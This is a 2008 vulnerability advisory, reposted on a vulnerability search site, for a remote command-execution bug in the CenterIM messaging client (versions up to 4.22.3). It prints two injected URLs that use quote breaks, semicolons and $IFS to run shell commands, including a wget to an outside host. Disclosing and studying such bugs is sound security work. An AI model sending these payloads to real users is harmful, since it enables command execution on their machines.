Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2008-1467

Publish Date: 20 Mar 2008

                							

                #######################################################################

Application:  CenterIM
              http://www.centerim.org/index.php/Main_Page
Versions:     centerim &lt;= 4.22.3
OS:           Linux
Bug:          Execution of shell commands
Exploit:      remote
Date:         15 March 2008
Author:       Brian Fonfara (w00)
   eMail:    brian.fonfara@gmx.de
   Web:       newb.kicks-ass.net


#######################################################################

1) Bug
2) Exploit


#######################################################################

=======
1) Bug
=======

Received URLs in the message window do not get checked for illegal
characters, like "\'", "\"", ";", "$", "{", "}", "&amp;&amp;" and "||"

#######################################################################

===========
2) Exploit
===========

Standard settings:
- Browser already open:
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(

- New browser instance:
http://gidf.de/centerim"&amp;cd$IFS$HOME/Desktop;wget${IFS}http://google.de"

#######################################################################

Greets to: mrks

# milw0rm.com [2008-03-20]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CenterIM 4.22.3 - Remote Command Execution

Vulmon Search

About

Products

Connect